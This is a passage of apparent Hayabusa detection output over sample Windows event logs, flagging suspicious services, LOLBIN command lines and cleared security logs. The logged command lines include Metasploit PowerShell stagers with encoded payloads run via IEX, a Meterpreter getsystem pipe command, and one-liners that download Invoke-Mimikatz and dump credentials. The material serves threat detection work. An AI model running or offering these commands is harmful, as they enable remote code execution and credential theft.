IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xb2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x104 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x5fc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,info,,New Service Installed,Name: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:27:39.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:27:42.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:27:42.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:27:44.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\g4g34pot.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xc58 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:28:55.689 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:28:55.705 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x924 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:28:58.267 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\wlqywrdm.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x71c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:33:13.923 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\0xqpayvt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x920 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:41:27.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kwos13rh.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x760 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x700 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:15:49.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:15:53.753 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:15:53.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xea8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:15:53.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x200 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
